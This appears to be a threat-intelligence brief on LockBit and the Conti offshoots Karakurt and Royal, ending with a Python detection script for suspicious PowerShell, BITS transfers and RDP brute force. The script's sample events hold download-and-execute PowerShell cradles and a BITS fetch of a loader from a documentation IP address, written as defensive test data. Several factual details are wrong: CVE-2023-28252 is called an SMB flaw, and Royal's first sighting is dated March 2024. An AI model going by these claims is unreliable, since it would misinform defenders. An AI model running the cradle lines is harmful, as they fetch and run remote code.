LockBit Leads Summer Ransomware Surge; Conti Offshoots Follow
In the summer of 2024, LockBit solidified its standing as the most prolific ransomware‑as‑a‑service (RaaS) operation, accounting for roughly 35% of all ransomware incidents tracked by Threat Intel analysts. The group’s latest builder, LockBit 3.0 (sometimes marketed as LockBit Black), deploys a dual‑extortion scheme that first exfiltrates sensitive data via custom "Eternity" implants and then encrypts files with AES‑256, using an RSA‑4096‑wrapped key for victim‑specific decryption. Recent campaigns have targeted critical manufacturing plants in Germany, a U.S. hospital network, and a Canadian municipal government, with affiliates leveraging Cobalt Strike beacons, PowerShell‑based script drops, and abuse of Windows BITS for stealthy command‑and‑control (C2) communications. A joint advisory from CISA, FBI, and NSA highlighted LockBit’s use of living‑off‑the‑land binaries (LOLBins) and recommended immediate patching of SMB‑related flaws such as CVE‑2022‑38045.
Two spin‑offs from the now‑defunct Conti organization have re‑emerged as distinct ransomware threats: Karakurt and Royal. Karakurt operates a "no‑encryption" data‑theft model, using the custom "Megalodon" implant to exfiltrate 10‑50 GB of corporate data before demanding a ransom for non‑publication. Its tactics include scheduled tasks for lateral movement, abuse of the Windows Background Intelligent Transfer Service (BITS) for data staging, and RDP brute‑force to gain initial access. Royal ransomware, first observed in March 2024, delivers a "Zeon" loader that drops a payload implementing AES‑256 file encryption paired with RSA‑4096 key exchange. Known victims include a UK‑based law firm and a South American retail chain, with the group typically demanding payment in Monero to complicate tracing.
Incident responders should adopt a layered defense strategy to counter these evolving threats. Network segmentation isolates critical assets, while rigorous patching of SMB vulnerabilities (CVE‑2022‑38045, CVE‑2023‑28252) removes common entry vectors. Deployment of Endpoint Detection and Response (EDR) solutions capable of flagging suspicious PowerShell script blocks and anomalous SMB traffic on ports 445, 139, and 8080 is essential. Organizations are urged to maintain offline, checksum‑verified backups and to subscribe to threat‑intel feeds that provide up‑to‑date YARA rules such as "LockBit_Hash_v3" for early detection of LockBit payloads. Continuous monitoring for indicators of compromise (IoCs) – including specific mutexes, C2 domains, and lateral‑movement patterns – combined with regular tabletop exercises, will strengthen resilience against the current ransomware surge.
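As an added example (not from the advisory or any vendor's product), the following Python sketch runs detection logic for three TTPs named in this brief over constructed Windows event records: suspicious PowerShell script blocks, BITS transfers to hosts outside an allowlist, and RDP brute force from a single source. The event IDs and field names are modelled on Windows logging, but the record layout, the allowlisted host, and the failure threshold are assumptions for the example.

```python
"""Toy detection pass over constructed Windows event-log records:
PowerShell script blocks (Event 4104), BITS client transfers (Event 59),
and failed RDP logons (Event 4625 with LogonType 10)."""
import re
from collections import Counter

# Sample events are constructed for this example, not captured data.
EVENTS = [
    {"id": 4104, "script": "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"},
    {"id": 4104, "script": "Get-ChildItem C:\\Logs | Measure-Object"},
    {"id": 4104, "script": "powershell -nop -w hidden -enc SQBFAFgAIAAoAE4..."},
    {"id": 59, "url": "https://update.corp.example/agent.msi"},
    {"id": 59, "url": "http://198.51.100.7/stage/loader.bin"},
]
# 25 failed RDP logons from one address and 2 from another (constructed).
EVENTS += [{"id": 4625, "logon_type": 10, "src_ip": "203.0.113.9"}] * 25
EVENTS += [{"id": 4625, "logon_type": 10, "src_ip": "10.0.0.5"}] * 2

# Markers typical of script-block abuse: download cradles, encoded commands, hidden windows.
PS_SUSPICIOUS = re.compile(
    r"(-enc(odedcommand)?\b|FromBase64String|Invoke-Expression|\bIEX\b|"
    r"DownloadString|Net\.WebClient|-w(indowstyle)?\s+hidden)", re.I)
BITS_ALLOWED_HOSTS = {"update.corp.example"}  # assumed internal software-distribution host
RDP_FAIL_THRESHOLD = 20                        # assumed tuning value

def _host(url):
    """Extract the host part of a URL (scheme://host[:port]/...)."""
    return re.sub(r"^\w+://([^/:]+).*$", r"\1", url)

def detect(events, rdp_threshold=RDP_FAIL_THRESHOLD):
    """Return a list of (rule, detail) alerts for the given events."""
    alerts, rdp_fail = [], Counter()
    for e in events:
        if e["id"] == 4104 and PS_SUSPICIOUS.search(e["script"]):
            alerts.append(("ps_scriptblock", e["script"][:40]))
        elif e["id"] == 59 and _host(e["url"]) not in BITS_ALLOWED_HOSTS:
            alerts.append(("bits_external_transfer", e["url"]))
        elif e["id"] == 4625 and e.get("logon_type") == 10:
            rdp_fail[e["src_ip"]] += 1
    # Aggregate failed RDP logons per source and alert once per noisy address.
    for ip, n in rdp_fail.items():
        if n >= rdp_threshold:
            alerts.append(("rdp_bruteforce", f"{ip} ({n} failures)"))
    return alerts

if __name__ == "__main__":
    for rule, detail in detect(EVENTS):
        print(f"[{rule}] {detail}")
```

In practice the same rules would be fed from PowerShell script-block logging, the BITS-Client Operational log and the Security log rather than an inline list, and the allowlist and threshold tuned to the environment.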